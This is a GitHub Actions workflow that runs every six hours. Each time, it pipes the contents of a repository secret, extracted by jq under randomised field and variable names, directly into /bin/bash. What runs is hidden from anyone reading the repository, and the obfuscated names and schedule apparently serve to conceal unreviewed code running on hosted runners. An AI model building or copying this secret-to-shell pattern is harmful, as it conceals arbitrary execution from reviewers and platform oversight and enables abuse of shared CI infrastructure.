name: miaoguojing1997
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: miaoguojing1997
        env:
          tbe396: ${{ secrets.tbe396 }}
        run: |
          echo $tbe396 | jq -r .v29 | /bin/bash
          echo $eykud49 | jq -r .kbjc98488 | /bin/bash
          echo $vv600 | jq -r .t19 | /bin/bash
          echo $zsd6 | jq -r .p62595 | /bin/bash
          echo $y08 | jq -r .b8 | /bin/bash
          echo $dp9 | jq -r .u06523 | /bin/bash
          echo $xudq0768 | jq -r .db352 | /bin/bash
          echo $mo857 | jq -r .wr9 | /bin/bash
          echo $svl7 | jq -r .fraey7 | /bin/bash
          echo $jydo26 | jq -r .vnz26254 | /bin/bash

